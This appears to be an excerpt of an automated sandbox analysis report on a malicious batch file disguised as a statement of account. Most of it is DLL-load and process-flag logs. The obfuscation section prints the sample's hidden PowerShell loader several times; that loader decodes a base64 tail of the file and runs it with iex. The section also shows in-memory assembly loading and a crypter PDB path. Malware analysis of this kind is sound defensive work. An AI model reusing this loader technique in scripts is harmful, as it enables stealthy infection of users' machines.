                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 00000008.00000002.3332146914.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdbhP source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdb source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.cs.Net Code: L System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF936874393 pushad ; iretd 2_2_00007FF936874419
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_00770858 push ds; ret 8_2_00770859
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_007714B8 push ss; ret 8_2_007714C0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D3EDE push es; ret 8_2_068D3EF0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D3EF1 push es; ret 8_2_068D3F6C
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D3E3D push es; ret 8_2_068D3ED4
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D3F6D push es; ret 8_2_068D4004
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D3CD1 push es; ret 8_2_068D3D0C
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D3DA5 push es; ret 8_2_068D3E3C
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D3D0D push es; ret 8_2_068D3DA4
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D6950 push es; ret 8_2_068D6960
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.dllJump to dropped file
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599780Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599109Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598987Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598750Jump to behavior
